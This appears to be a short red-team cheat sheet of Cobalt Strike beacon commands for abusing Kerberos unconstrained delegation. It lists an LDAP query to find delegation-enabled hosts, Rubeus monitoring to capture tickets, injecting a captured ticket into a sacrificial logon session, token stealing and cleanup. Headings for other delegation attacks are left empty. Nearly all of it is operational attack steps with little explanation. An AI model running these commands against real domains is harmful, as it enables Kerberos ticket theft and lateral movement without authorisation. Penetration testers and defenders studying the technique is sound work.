Kerberos
Unconstrained Delegation
# Find unconstrained delegation
beacon> ldapsearch (&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288)) --attributes samaccountname
# Use rubeus for monitoring
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /nowrap
# Kill rubeus once done
beacon> jobs
beacon> jobkill $NUMBER
# Inject in sacrificial login
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CONTOSO.COM /username:dyork /password:FakePass /ticket:[TICKET]
# Now steal token from the session
beacon> steal_token $PID
beacon> run klist
# Cleanup
beacon> rev2self
beacon> kill $PIDConstrained Delegation
Resource Based Constrained Delegation
Name
Description
Ticket(s)
Last updated